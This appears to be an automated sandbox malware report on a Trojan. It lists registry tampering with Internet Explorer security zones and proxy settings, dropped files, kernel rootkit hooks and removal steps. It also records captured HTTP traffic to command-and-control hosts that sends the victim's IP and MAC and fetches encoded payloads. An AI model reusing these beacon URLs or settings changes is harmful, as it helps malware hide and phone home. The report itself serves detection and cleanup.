[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D7 E3 22 63 02 25 39 AD A1 3E C2 E1 1A 86 45 50"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process ndislib.exe:3296 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 B7 C4 21 DA 26 5B B7 48 09 01 EF 15 6D 02 01"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan deletes the following registry key(s):
[HKLM\System\CurrentControlSet\Services\uo2zITM\Security]
[HKLM\System\CurrentControlSet\Services\uo2zITM]
[HKLM\System\CurrentControlSet\Services\uo2zITM\Enum]
Dropped PE files
MD5 | File path |
---|---|
ac26e6f812162a024170cb017e6da5c8 | c:\WINDOWS\HpE\hdptlk.exe |
eba2283a18b7a9e89bf308a9e5e1608c | c:\WINDOWS\HpE\sys32\urlnav.dll |
fc2c1ce99b49f7ac04ef3ff570061ae9 | c:\WINDOWS\system32\LQdhJ\yYJSx.exe |
d70c6fba5055c9f030553d69ca959ef1 | c:\WINDOWS\system32\drivers\HideSys.sys |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
The Trojan installs the following kernel-mode hooks:
ZwCreateSection
The Trojan installs the following kernel-mode hooks:
ZwOpenProcess
ZwQuerySystemInformation
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Scan a system with an anti-rootkit tool.
- Terminate malicious process(es) (How to End a Process With the Task Manager):
nvsvc32.exe:2544
hdptlk.exe:2556
ndis500.exe:2916
yYJSx.exe:1976
appmon.exe:3368
%original file name%.exe:228
MiniIE.exe:2752
ndsqp.exe:2956
tray.exe:3316
traytp.exe:452
ndislib.exe:3296 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%WinDir%\HpE\wow64\configWord.cf (676 bytes)
%WinDir%\HpE\wow64\rebuild.exe (8147 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\hotkey[1].txt (676 bytes)
%System%\cBLK.dll (2341 bytes)
%System%\clk.ini (186 bytes)
%WinDir%\HpE\wow64\DProEx.sys (1176 bytes)
%WinDir%\HpE\wow64\reTcp.sys (588 bytes)
%WinDir%\HpE\wow64\config.ini (98 bytes)
%WinDir%\HpE\sys32\weblog.log (263 bytes)
%WinDir%\HpE\sys32\m0gtv9N (3809 bytes)
%WinDir%\HpE\sys32\xp28p2U.sys (22 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\evaqocv.txt (17 bytes)
%System%\tl.dat (13 bytes)
%System%\bc.dat (3808 bytes)
%System%\tl.txt (1444 bytes)
%WinDir%\HpE\First.txt (23220 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yfodbgl.txt (2321 bytes)
%WinDir%\HpE\sys32\urlnav.txt (14076 bytes)
%System%\ndislib.exe (243 bytes)
%WinDir%\HpE\hdptlk.exe (139 bytes)
%WinDir%\HpE\sys32\tray.txt (221016 bytes)
%WinDir%\HpE\wow64\nvsvc32.exe (17629 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tcueuqo.txt (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mwgxskf.txt (673 bytes)
%WinDir%\HpE\exec\traytp.exe (1794 bytes)
%WinDir%\HpE\wow64\nvsvc32.txt (448324 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\lfllrdu.txt (15278 bytes)
%WinDir%\HpE\MiniIE.txt (175005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\przmycg.txt (673 bytes)
%System%\ndislib.txt (40972 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\sccppeu.txt (13122 bytes)
%System%\bc.txt (127812 bytes)
%WinDir%\HpE\MiniIE.exe (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\uwvmjte.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mxezyyf.txt (7345 bytes)
%WinDir%\HpE\sys32\ndis500.exe (325 bytes)
%WinDir%\HpE\sys32\whitelist.dat (2 bytes)
%WinDir%\HpE\sys32\urlnav.dll (83 bytes)
%System%\appmon.exe (9606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ihutphk.txt (1425 bytes)
%WinDir%\HpE\sys32\tray.exe (7972 bytes)
%WinDir%\HpE\sys32\whitelist.txt (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rhkqvcb.txt (26096 bytes)
%WinDir%\HpE\sys32\ndis500.txt (55748 bytes)
%System%\lhc.txt (32148 bytes)
%WinDir%\HpE\sys32\ndsqp.exe (106 bytes)
%WinDir%\HpE\exec\traytp.txt (88420 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\oqgrsfe.txt (10177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nagsjof.txt (601 bytes)
%WinDir%\HpE\flist.bin (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ipobzxt.txt (4545 bytes)
%System%\drivers\HideSys.sys (15 bytes)
%System%\appmon.txt (263811 bytes)
%System%\lhc.dat (185 bytes)
%WinDir%\HpE\sys32\ndsqp.txt (17980 bytes)
%WinDir%\Temp\AdbWinUsbApi.dll (60 bytes)
%WinDir%\Temp\adbWinpi.dll (304 bytes)
%WinDir%\Temp\Cattle.exe (3727 bytes)
%WinDir%\Temp\AdbWinApi.dll (96 bytes)
%WinDir%\Temp\TscServer.exe (1653 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\PYJT5JHI\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0HUL6ZQ7\desktop.ini (67 bytes)
%System%\LQdhJ\yYJSx.exe (414 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\P4IK7RMW\desktop.ini (67 bytes)
%WinDir%\HpE\sys32\oK455Vp (13 bytes)
%WinDir%\HpE\sys32\z7AQ9Ew.sys (22 bytes)
%WinDir%\HpE\sys32\services.exe (3904 bytes)
%WinDir%\HpE\exec\ico.ini (292 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\8LG56LOL\statbar[1].ini (152 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\traytp.lnk (640 bytes)
%System%\v9pce8W (1629 bytes)
%System%\weblog.log (349 bytes)
%System%\gy17y1D.sys (22 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 455174 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.rdata | 462848 | 2431724 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.data | 2895872 | 207240 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp0 | 3104768 | 966430 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
.vmp1 | 4071424 | 3871300 | 3874816 | 5.44825 | 0c41f9724bee2aaa564195d102c256f0 |
.rsrc | 7946240 | 5744 | 8192 | 1.90322 | 200729e9e76fca5d3157a990fafb7b96 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://update.down123.net/tongji.php?action=list&username=icafe8&password=icafe8123&ips=192.168.11.131&version=2.0.0.4 | 115.28.45.16 |
hxxp://update.down123.net/deploy.php?ConFig=xz9 | 115.28.45.16 |
hxxp://1st.ecoma.ourwebpic.com/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 | |
hxxp://ln.p2ptool.com/txt/tray_20150624.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=B8306AB9C2162907E3E8248D11FF7A56 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/urlnav_20150922.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=5FC91A5A977345D62B641C89CD1CE439 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/First_20150519.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=460C53B3BCD3A1C782689F34C2BA4209 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/minie_20151111.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=9F815C0051C483DA569169A49B602D2A | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listbc_20151106222121.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=528D1A231BC2A6FDDAB37F9BE32D5F93 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/list666_20151104221146.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=CE0BAC1422C834FD0E304C8696FEA341 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/ndis500_201511062222.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=54F3F83A085F1E98C35C0A722AB6E096 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/app_20150618.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=8097F137AC26A6567AB9ADCE590E5996 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/miniIE_150427.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=29B2926F658D9D3DBBC270CEAEC775A6 | 60.18.147.37 |
hxxp://ln.p2ptool.com/txt/whitelist.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=25AEE42B466DB1826F98A5F21A9A9C94 | 60.18.147.37 |
hxxp://plus.zzinfor.cn/plus/config/down123.0.bin?ver=3.180&lip=192.168.11.131&mac=000C298A8B37 | 203.130.58.30 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /txt/ndislib_201511101943.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=919B83DDDD26688CC57C40AF5624370C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:49 GMT
Content-Type: text/plain
Content-Length: 324428
Last-Modified: Tue, 10 Nov 2015 11:43:50 GMT
Connection: close
ETag: "5641d876-4f34c"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjThfOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHBOK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRSI7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /txt/qpqpqp_201511062252.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=DB76EA1050F45972FC55D29EC800228E HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:46 GMT
Content-Type: text/plain
Content-Length: 141392
Last-Modified: Fri, 06 Nov 2015 14:52:41 GMT
Connection: close
ETag: "563cbeb9-22850"
Accept-Ranges: bytes
nHI3CO5IFhWAsJctTmj IfiJj VnDiHf5btYxTcOw4HE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WtCdFRaA9XVxQksPnBhMH CyxDZVRIYXFFpm0MAo6DgC2QRv2YTwIwT29XazHhXVrQwYd9QvPwQZJhMLtkxzc e3eegsVDHMnKaEKbhAp/JvZsvB8Nn4Io6syqgQ9/SDaBLyvdjThfOrxE3XJ re1nM L5TwwJP6H0pEUYmcRBmOceMRuqxVNkb7JwfEVu4XsUhcvwly vksMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5ay0C63Xri3dB0xVG2WOXvXn3YNPrA6SxfVvh3CJHt4bIKI0mNWJEoCFRjYnLeAoMjy5ye8miatn/lycn0DaQTrWJvgEYtUqAbYm ARi1SoBtPvK pACZjJd7NldsOW7Tl sMaJudVXlW6wxom51VeVZRJhvIVRruRMTazQ2ZSPlrbN9ymUhbHBOK3fYskZxLv8TazQ2ZSPlrxNrNDZlI WuRDnkI6xLTnMTazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrF1t0sbdoWZzE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrTPMmJn/9ziGb5WV0mXW AYsYpk leK3vxNrNDZlI WtXEcfORTifCxn ZMaxjFZ7qzIWGvSJ2G7O6XC5Y8YEKsTazQ2ZSPlrEkYhq4qBTrw/Rp3LuKWWWN0D6Bmr0kKeRSI7 4oAkizE2s0NmUj5a3C2I9Jaq5QixNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrxNrNDZlI WvE2s0NmUj5a8TazQ2ZSPlrGwk/Dns/Y08qL4WDoLD oW3yI nE 5Ft5gY56mj9A0om63bSlJ/0Oy6tRS5Dm3SiqSQMs7a n1G2cKNuElZSmmL5PfQjk3LmCUAzwPyKFymTuNpzKZ3D9LE13E7e3X22xoBkwrLDH iwt 0EC6c7IQTYRMkU0E7CDhDBtJFxElLm8XRdVeGS10qqLxRG/4nXI6Gb0tSXPVdrB8Cjc3Loba CrlOlo7Gz
<<< skipped >>>
GET /txt/listtl_20151106225212.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=4B0E137FE48D0E571230DAD7F1219CBA HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:39 GMT
Content-Type: text/plain
Content-Length: 17808
Last-Modified: Fri, 06 Nov 2015 14:52:13 GMT
Connection: close
ETag: "563cbe9d-4590"
Accept-Ranges: bytes
fb5EWIYv9SGmfkw3suNrnMDH6q7RnjROKjttvFmiakCZt5yAEloqcdFU3c0qOtFRYDZAdHHwb Qxt9I jqSgc4ULm66opXrWBkOiGdpJ xQoMTH3OmgMQJkUShelUIsDfL/hdCWFtkn/y62uU0mNGqMsAApyLHJ4j6aH00q0LLsr6FlXJFw9vDIbA8NM/MBAcsX/7BlxWcm jOrtHzXNJwHVr1zBaZBvDIhS24H2g4292X8RJor98PJ/3Y RAHLFiBns21a08LzZ9NQJKMqlTtge75/mtJONL4g mIuCzv1s5vG78A6DGTbVaOa1tXM1tCuQn5reB/GadtqV6Y5LJt7Ek3k/W2aZ85m6MostnYNXS5PA1dBcmiDVyHpS9CA/ZF3msze1qfmM4ySmpBTxy1O5vT wkQGvUjqJOUSqN7 bFBWSdZKyfDWgfcJ5BEK rYVr4Ti1ZvAVDdS9TT0sp1QglzpGQ7ATTd2J nZGQwwbwoUSDkEDD/jk3M/k5HFHcsbNHhOchtR0U1l60XX357YnLbrtgMM24tPM5IuTMWwWZewnxW8JOIptenBO3ZCnKp1kJtXgfe1UW4uGAjNlmR1fKC L/NftvcUWkpO9eliCl2AfmFx/qgZ13w8PyvLPTXcL JXD5HyRaMQdZ9Y7YcIDfT0iBIhvTM5jY66l3DbzUJcXQNKlZgqSb8 Ae/V2PH/qVC6zaNt9XzQFqYllpIjfOSbQ7ki3aXAJVFiW6v36EHjFGWhMWrbTuoJTZfRk6hAkN4gK3q3Z1tP8vDNMzE/D7lZg9mIww7esNKBvDHYPwFmdbrZOFClhIIzcEryxXp2kGPfrBsQqtlv3i8iM3CgETUyfIVMbla/r4MeVT60Etch7IV4MKloRceCEaHUIUEsGpfKiTsLH4l5FkFAOIc3buJHaeAMAmh7Xojqnpz f/tYFXf2j1pee3DTbhsT82ABDkRytOsKxFXiAuofNV2GHabjaUOJQ6mxSx8oPqfELHIPn1p5WgBmct5GdqTfL3bMRF95j5esatBQcGwPgULXT4RnY9gix5OJKSK0ajYbXQG7I8LIt7IZTOzLWFySDobY2xdfxLtQybtJZsMP5pvpqhsEWYZUwLMKhdFzYWEYNMUGUipV/spHDdbiVSrjhP9b/qwVyW6YFLoiO7uVwvsrX 14gkE ted0FmzahoKLwWTeoxgP5l8NNC2S4mDakhpSpLhK/UwVQ5/Drrjs5c9WLgqTwr6e3lBGIRg0ZBKieftYq0gI9u9aqmfDv145VCYstieNcaIFj2Iv/A/o7REZEvT4V2cS4biMlG4duycqvLpBkaFhyg3GPNDAHGzziZISsm5psTMviD6Yi4LO/WXVjfp5EIfQ8ySqMTmVe/CcLz/v6BdJXF4J7nCND/v2Ho5LnzeIeKyScOGHbxpIXGwz5Bmp7YZJm1Lj Lt4SWIq6OULu3vMH eoC/mJ kA15SGWTSvEPvDvFy6X6sH0VAKKIWpnEtiaLhYCFIZ7MkkDIfQ3wN50TZmRvl620owG
<<< skipped >>>
GET /txt/popup_20150930.txt?ver=3.180&uid=down123.0&lip=192.168.11.131&mac=000C298A8B37&p=0&b=0.0.0.0.0&md5=10A09BBF8BDB9E612ED1DF8F61B9CC3C HTTP/1.1
Accept: */*
Accept-Encoding: deflate
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727;)
Host: ln.p2ptool.com
Connection: Close
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: Tengine/2.0.2
Date: Wed, 11 Nov 2015 11:15:30 GMT
Content-Type: text/plain
Content-Length: 1840480
Last-Modified: Wed, 30 Sep 2015 02:45:35 GMT
Connection: close
ETag: "560b4ccf-1c1560"
Accept-Ranges: bytes
